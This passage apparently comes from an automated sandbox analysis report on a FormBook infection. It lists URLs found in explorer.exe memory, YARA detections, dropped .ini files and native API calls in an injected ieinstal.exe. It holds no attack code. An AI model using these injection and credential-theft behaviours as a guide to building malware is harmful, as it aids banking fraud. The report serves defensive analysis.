          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.313630372.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000009.00000000.313630372.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000009.00000000.316129007.000000000B1D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\N64OT294\N64logri.ini
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\N64OT294\N64logrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9540 NtReadFile,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B95D0 NtClose,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B97A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B98F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053BAD30 NtSetContextThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9520 NtWaitForSingleObject
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9560 NtWriteFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B95F0 NtQueryInformationFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9730 NtQueryVirtualMemory
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053BA710 NtOpenProcessToken
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053BA770 NtOpenThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9770 NtSetInformationFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9760 NtOpenProcess
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9FE0 NtCreateMutant
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9610 NtEnumerateValueKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9670 NtQueryInformationProcess
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9650 NtQueryValueKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B96D0 NtCreateKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9950 NtQueueApcThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B99D0 NtCreateProcessEx
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9820 NtEnumerateKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053BB040 NtSuspendThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B98A0 NtWriteVirtualMemory
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9B00 NtSetValueKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053BA3B0 NtGetContextThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9A10 NtQuerySection
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053B9A80 NtOpenDirectoryObject
